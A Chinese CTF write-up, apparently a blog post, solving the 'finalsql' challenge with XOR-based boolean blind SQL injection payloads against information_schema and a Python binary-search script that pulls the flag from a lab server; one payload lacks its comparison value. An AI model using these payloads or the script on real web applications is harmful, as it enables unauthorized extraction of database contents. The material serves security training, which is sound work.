zoukankan      html  css  js  c++  java
  • [极客大挑战 2019]finalsql

    ?id=1^ascii(substr(database(),1,1))>97 #    数据库盲注payload

    尝试得到数据库名geek

    ?id=1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='geek'),1,1))>)#   表名盲注payload

    尝试得到表名F1naI1y,Flaaaaag

    ?id=1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)='Flaaaaag'),1,1))>99)  列名盲注payload

    尝试得到列名id,username,password id,fl4gawsl

    最后要写脚本

    import requests

    url = "http://15d5be57-364a-4e40-ba63-be0f9038ec22.node3.buuoj.cn/search.php?"
    temp = {"id" : ""}
    column = ""
    for i in range(1,1000):
        low = 32
        high =128
        mid = (low+high)//2
        while(low<high):
            temp["id"] = "1^(ascii(substr((select(group_concat(password))from(F1naI1y)),%d,1))>%d)^1" %(i,mid)
            r = requests.get(url,params=temp)
            #print(low,high,mid,":")
            if "Click" in r.text:
                low = mid+1
            else:
                high = mid
            mid =(low+high)//2
        if(mid ==32 or mid ==127):
            break
        column +=chr(mid)
        print(column)


    print("flag=" ,column)
    #二分查找

  • 相关阅读:
    webpack配置模块的查找范围
    webpack中resolve用法
    C语言中的字符串
    bash通配符与特殊符号
    求两个字符串的最大公共子串
    linux内核编译
    数据库中使用索引来提高查询的速度
    数据库中的主键与外键
    Linux学习——命令3
    Linux学习——命令2
  • 原文地址:https://www.cnblogs.com/CNdate/p/13266827.html
Copyright © 2011-2022 走看看